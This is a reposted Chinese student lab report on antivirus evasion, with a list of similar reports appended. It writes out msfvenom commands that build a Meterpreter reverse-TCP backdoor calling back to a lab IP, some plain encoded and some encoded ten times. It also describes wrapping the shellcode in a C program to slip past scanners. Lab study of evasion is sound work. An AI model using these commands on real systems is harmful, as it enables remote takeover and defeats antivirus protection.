Exp3 免杀原理与实践 20154328 常城
Exp3 免杀原理与实践
一、基础问题回答
1.杀软是如何检测出恶意代码的?
恶意代码有其特有的特征码,杀软将特征码加入检测库中,当检测到一段代码中具有这样的特征码时就可以判断为恶意代码。
为了防止自身特征码被检测,有些恶意代码使用了免杀加壳软件进行加壳,一些流行的加壳软件已经可以检查出来,如果被这样的加壳软件加壳就可能是恶意代码。
判断该代码是否有恶意行为,若有就会判断代码是恶意代码。
2.免杀是做什么的?
通过各种手段免除计算机对恶意代码查杀即为免杀。
3.免杀的基本方法有哪些?
(1)通过改变自身特征码
加壳(可以选择比较新的、冷门的壳,流行的已经可以被大多数杀毒软件查杀)
进行异或、逆序或者其他手段改变自身特征码。
通过改变软件攻击的行为
(2)在看似正常的应用中插入恶意代码,当程序运行时看似正常,可以逃过查杀。
可以使用反弹端口技术,这样看上去就像是靶机在主动链接ip,大大减低被查杀的风险。
使用隧道技术。
二、离实战还缺些什么技术或步骤?
如何将我们制作的后门程序传到靶机上
如何让靶机运行这个看起来不知道有什么用途的程序…
如何保证自己的主机ip地址不变,随时随地都可以进行攻击
三、实践过程
- msfvenom直接生成meterpreter可执行文件
. 直接将上周做实验时用msf生成的后门文件放在virscan.org中进行扫描,扫描结果如下:
从上图可以看出,许多杀软一针见血的指出了该程序为“木马类”程序
有20/39的杀毒软件发现有病毒
Msfvenom使用编码器生成meterpreter可执行文件
(1)一次编码:
使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.199.120 LPORT=4328 -f exe > fool4328.exe命令生成编码过的可执行文件fool4328.exe
我们发现被编码后的payload大小为360字节,上面直接生成的payload大小为333字节,但是最终文件的大小都是73802字节。
再次使用virscan.org检测
我们发现有19/39的杀毒软件发现有病毒,只有微小的变化,因为AV不是吃素的,AV的工作人员都有相关做恶意代码的经验,编码这种事情肯定难不倒他们。
(2)多次编码:
我们尝试使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.199.120 LPORT=4328 -f exe > fool4328-e8.exe命令将文件编码10次,得到如下结果:
将生成的文件放到网站上扫描一下:
可以发现无论编码多少次都是一样,所以想要利用编码次数来达到免杀效果显然是不行的。
3. Veil-Evasion免杀平台
4. C语言调用Shellcode
在kali主机下,进入终端,执行指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=4328 -f c
LHOST:攻击机IP
LPORT:反弹连接端口
c:生成一个c语言格式的Shellcode数组
创建一个C文件:changcheng.c(意为免杀shellcode),将上面生成的数组copy到该文件下,并加入一个主函数:
放到网上检查一下:
将上面生成的数组copy到主机上,用vc编写一个C程序并编译,在Kali下使用msf监听,运行刚刚编译生成的可执行文件,成功获取权限:
放到网上检测一下:
实验总结
以前的时候觉得杀毒软件是万能的,只要打开了杀毒软件就没有问题了。到了现在才发现杀毒软件是有很大的局限性的,稍加伪装就会蒙混过关。
杀毒软件只能用于病毒的防范,但主要的是要靠我们自己平时规范上网,不要点那些来历不明的链接。
我们要及时更新病毒库,病毒日新月异,我们要及时更新,这样可以减少自己电脑的中毒几率。
转载于:https://www.cnblogs.com/20154328changcheng/p/8736200.html
Exp3 免杀原理与实践 20154328 常城相关推荐
- 2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...
- 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践
目录 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践 实验内容 基础问题回答 实践过程记录 任务一:正确使用免杀工具或技巧 任务二:通过组合应用各种技术实现恶意代码免杀 任务 ...
- 20164301 Exp3 免杀原理与实践
Exp3 免杀原理与实践 1. 实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应 ...
- Exp3 免杀原理与实践 20164323段钊阳
网络对抗技术 20164323 Exp3 免杀原理与实践 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何 ...
- 网络对抗 Exp3 免杀原理与实践 20154311 王卓然
Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的? ①基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶意软件. ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp3 免杀原理与实践 目录 0. 基础知识 1. 实验内容 1.1 方法 1.1.1 正确使用msf编码器 1.1.2 ...
- Exp3 免杀原理与实践 20164321 王君陶
Exp3 免杀原理与实践 20164321 王君陶 1实验要求 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分), ...
- 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践
2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...
- 20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5
<网络对抗技术>Exp3 免杀原理与实践 Week5 一.实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shell ...
- 20145307陈俊达《网络对抗》Exp3 免杀原理与实践
20145307陈俊达<网络对抗>Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的 ...
最新文章
- 打开服务器数据库文件,如何打开服务器中的数据库文件
- Java内存使用情况查看工具
- 数学入门题——《算法竞赛入门经典-训练指南》
- 超级有用的15个mysqlbinlog命令
- 关于JavaScript系列的自学,该怎么学比较好?
- Troubleshooting OpenStack 瘫痪 - 每天5分钟玩转 OpenStack(160)
- php7安装详解、,php7安装详解(windows环境)
- Centos7下编译安装Nginx、Mysql、PHP(文章底部包含一键安装脚本)
- 2020年mac上最值得使用的五大录屏软件
- 辅助工具_keysight_手持频谱仪(HSA) N9340B SCPI命令
- (HTML+CSS+JS)仿小米官网首页 含源码
- 电信天翼路由器 连接另外一个路由器
- 小目标检测的一些理解
- 柔宇科技掀起的柔性电子潮流,正在加速改变我们的生活
- springsecurity整合jwt实现授权认证,权限分配
- AutoCAD Civil3D纵断面图中如何修改坡长为变坡点之间的距离
- 叔本华系列之(一)论独立的思考
- Swift 5 Type Metadata 详解
- 优化Elasticsearch之如何合理分配索引分片
- 如何开发手机APP软件?